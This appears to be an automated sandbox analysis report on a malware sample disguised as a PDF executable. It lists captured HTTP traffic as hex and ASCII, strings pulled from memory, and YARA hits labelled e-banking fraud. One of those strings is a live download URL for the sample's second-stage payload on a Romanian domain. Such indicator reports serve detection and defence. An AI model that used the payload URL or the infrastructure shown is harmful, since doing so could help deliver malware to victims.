68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:34:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:35:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/0H
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calit
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
        Source: unknownHTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
